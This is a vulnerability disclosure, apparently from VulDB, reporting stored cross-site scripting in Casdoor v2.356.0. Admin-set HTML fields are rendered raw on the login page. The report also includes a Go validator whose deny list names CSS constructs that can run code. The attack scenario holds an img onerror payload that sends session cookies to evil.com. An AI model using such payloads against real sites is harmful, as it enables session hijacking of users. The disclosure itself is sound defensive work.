Submission #781770: Casdoor v2.356.0 Cross Site Scripting (Info)

Title: Casdoor v2.356.0 Cross Site Scripting

Description: Stored XSS via Application formCss / formSideHtml

**Evidence:**

```javascript
{inIframe() || isMobile() ? null : <div dangerouslySetInnerHTML={{__html: application.formCss}} />}
{inIframe() || !isMobile() ? null : <div dangerouslySetInnerHTML={{__html: application.formCssMobile}} />}
<div dangerouslySetInnerHTML={{__html: application.formSideHtml}} />
```

The `formCss`, `formCssMobile`, and `formSideHtml` fields from the application object are rendered as raw HTML using `dangerouslySetInnerHTML`. If an organization admin (or anyone who can modify application settings) injects malicious JavaScript into these fields, it executes for every user who visits the login page.

**Attack scenario:** An org admin sets `formSideHtml` to `<img src=x onerror="fetch('https://evil.com/steal?t='+document.cookie)">`. Every user visiting the login page has their session cookies exfiltrated.

**Fix:** Sanitize these fields with a library like DOMPurify before rendering, or restrict them to a CSS-only subset by parsing and validating the content server-side.
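A server-side validator of the kind the fix suggests, added here as an example and not Casdoor's own code (Casdoor's backend is written in Go). `ValidateFormCSS` is a hypothetical name; it assumes `formCss` holds either bare CSS or a single `<style>...</style>` wrapper, and it rejects anything outside a conservative CSS subset so that markup such as the `onerror` payload above never reaches `dangerouslySetInnerHTML`.

```go
package main

import (
	"errors"
	"regexp"
	"strings"
)

// Hypothetical validator for Casdoor's formCss/formCssMobile fields (added example, not
// Casdoor code). Assumes the field is bare CSS or one <style>...</style> wrapper.
var (
	styleWrap  = regexp.MustCompile(`(?is)^\s*<style>(.*)</style>\s*$`)
	cssComment = regexp.MustCompile(`(?s)/\*.*?\*/`)
	selectorRe = regexp.MustCompile(`^[\w\s.#:,>+~*\-\[\]="'()]+$`)
	declRe     = regexp.MustCompile(`^[a-zA-Z-]+\s*:\s*[\w\s#%.,\-/'"!()]+$`)
	// Constructs that let CSS load or run code; named explicitly because the value grammar above would otherwise admit url(...) and escapes.
	banned = []string{"url(", "expression(", "@import", "javascript:", "behavior:", "-moz-binding", `\`}
)

// ValidateFormCSS returns nil only when input is a plain stylesheet with no markup inside it.
func ValidateFormCSS(input string) error {
	css := styleWrap.ReplaceAllString(input, "$1") // strip the single permitted wrapper, if present
	if strings.ContainsAny(css, "<>") {
		return errors.New("markup is not allowed inside formCss")
	}
	rest := strings.TrimSpace(strings.ToLower(cssComment.ReplaceAllString(css, "")))
	for _, b := range banned {
		if strings.Contains(rest, b) {
			return errors.New("forbidden construct: " + b)
		}
	}
	// Walk "selector { decl; decl }" blocks; @media and nested blocks are rejected by design.
	for rest != "" {
		open, end := strings.IndexByte(rest, '{'), strings.IndexByte(rest, '}')
		if open < 0 || end < open {
			return errors.New("malformed rule block")
		}
		if !selectorRe.MatchString(strings.TrimSpace(rest[:open])) {
			return errors.New("invalid selector")
		}
		for _, d := range strings.Split(rest[open+1:end], ";") {
			if d = strings.TrimSpace(d); d != "" && !declRe.MatchString(d) {
				return errors.New("invalid declaration: " + d)
			}
		}
		rest = strings.TrimSpace(rest[end+1:])
	}
	return nil
}
```

`formSideHtml` is HTML by design, so this check only covers the two CSS fields; the HTML field still needs a real sanitizer such as the DOMPurify the report names.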
User: Ghufran Khan (UID 95493)
Submitted: 2026. 03. 17. 02:25 PM (18 days ago)
Moderation: 2026. 04. 03. 09:26 AM (17 days later)
Status: Accepted
VulDB Entry: 355072 [Casdoor 2.356.0 dangerouslySetInnerHTML formCss/formCssMobile/formSideHtml Cross Site Scripting]
Points: 17
